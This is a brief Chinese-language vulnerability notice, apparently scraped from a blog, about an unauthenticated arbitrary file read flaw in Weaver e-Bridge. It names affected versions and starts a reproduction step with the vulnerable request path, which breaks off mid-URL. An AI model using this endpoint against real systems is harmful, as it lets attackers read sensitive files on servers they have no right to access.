泛微OA雲橋 未授權任意文件讀取

0x00 漏洞描述 泛微雲橋(e-Bridge)是上海泛微公司在」互聯網+」的背景下研發的一款用於橋接互聯網開放資源與企業信息化系統的系統集成中間件。泛微雲橋存在任意文件讀取漏洞,攻擊者成功利用該漏洞,可實現任意文件讀取,獲取敏感信息。 0x01 影響版本 2018-2019 多個版本。 0x02 漏洞復現 第一步:/wxjsapi/saveYZJFile?fileName=test&downlo
相關文章
相關標籤/搜索